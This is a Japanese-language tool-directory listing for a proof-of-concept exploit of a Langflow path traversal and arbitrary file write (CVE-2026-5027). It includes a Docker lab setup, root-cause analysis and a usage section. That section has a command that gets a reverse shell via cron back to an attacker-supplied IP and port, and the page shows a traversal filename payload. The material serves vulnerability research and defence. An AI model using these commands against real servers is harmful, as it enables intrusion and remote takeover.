Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-5027 — CVE-2026-5027の概念実証エクスプロイト。Langflowの /api/v2/files エンドポイントにおけるパストラバーサルおよび任意ファイル書き込みで、Dockerラボとリバースシェルオプションを備えています。 | Kitploit
ツール/GitHubGitHub/yym8538/cve-2026-5027
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストリモートアクセスツール
GitHubyym8538/cve-2026-5027

CVE-2026-5027

CVE-2026-5027の概念実証エクスプロイト。Langflowの /api/v2/files エンドポイントにおけるパストラバーサルおよび任意ファイル書き込みで、Dockerラボとリバースシェルオプションを備えています。

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

本記事は EQSTLab によって公開された研究記事です。

本脆弱性を報告・分析してくださった Yahia Hamza 氏に感謝します。

CVE-2026-5027

★ CVE-2026-5027 Langflow パストラバーサル / 任意ファイル書き込み PoC ★ CVE-2026-5027 PoC test


概要

CVE-2026-5027 : Langflow 任意ファイル書き込み脆弱性

説明: Langflow <= 1.8.4 におけるパストラバーサル脆弱性により、攻撃者は /api/v2/files エンドポイントに送信する細工されたマルチパートの filename を介して、意図されたアップロードディレクトリ外に任意のファイルを書き込むことができます。自動ログインが有効になっている、あるいは認証が脆弱にしか適用されていないデプロイメントでは、この問題を悪用して攻撃者が制御するコンテンツを機密性の高いファイルシステム上の場所に書き込むことで、リモートコード実行を達成できる可能性があります。


ラボ環境のセットアップ

Docker を使用して脆弱な環境をビルドおよび実行します:

イメージのビルド

root@kitploit:~
docker build -t cve-2026-5027 .

コンテナの実行

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

使用方法

実行

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

分析

脆弱なエンドポイント

root@kitploit:~
POST /api/v2/files

この問題は、アップロード機能がクライアントから提供されたマルチパートの filename 値を信頼しているために存在します。安全なサーバー側の保存名を生成したり、解決されたパスを専用のアップロードディレクトリに制限したりする代わりに、脆弱なコードパスは ../ のようなトラバーサルシーケンスが最終的な保存先パスに影響を与えることを許可しています。

その結果、攻撃者は意図されたストレージルートから脱出し、アプリケーションにサーバーファイルシステム上の任意の場所へファイルを書き込ませることができます。

代表的な悪用フローは以下のとおりです:

  1. 通常のログイン、または自動ログインが有効なデプロイメントを通じてアクセストークンを取得します。
  2. /api/v2/files にマルチパートのアップロードリクエストを送信します。
  3. パストラバーサルシーケンスを含む細工された filename を指定します。
  4. Langflow に攻撃者が制御するコンテンツを想定されたストレージディレクトリ外に書き込ませます。

これは本質的に CWE-22: パス名の制限されたディレクトリへの不適切な制限 の問題です。

技術的な根本原因

このセキュリティ上の欠陥は、アップロード処理中におけるユーザー制御のファイルパスの不十分なサニタイズと検証によって引き起こされています。アプリケーションはクライアントの元のファイル名を受け入れ、パスの正規化と封じ込めを適切に実施することなくストレージワークフローに渡しています。

防御の観点から見ると、危険なパターンは概念的には以下と同様です:

root@kitploit:~
save_path = base_dir / file.filename

もし file.filename が以下のようなパストラバーサル要素を含んでいる場合:

root@kitploit:~
../../../../tmp/poc.txt

最終的に解決されるパスは base_dir の外を指す可能性があり、任意ファイル書き込みが可能になります。

これが重要な理由

任意ファイル書き込み脆弱性は、標準的な無制限アップロード問題よりも深刻であることが多いです。なぜなら、攻撃者はファイルの内容だけでなく、保存先のパスも制御できるからです。Langflow プロセスの実行権限に応じて、以下が可能になる可能性があります:

  • アプリケーションファイルの上書き
  • 起動ファイルやスケジュールタスクファイルの改ざん
  • シェル初期化ファイルやキーファイルを通じた永続化
  • 任意ファイル書き込みからリモートコード実行への昇格

シナリオ

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

免責事項

このリポジトリは、Langflow インスタンスの不正な悪用を助長することを意図したものではありません。このプロジェクトの目的は、セキュリティ研究者、防御担当者、開発者が脆弱性を理解し、制御された環境で露出を検証し、効果的な緩和策を適用できるように支援することです。


参考資料

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

ツールをダウンロード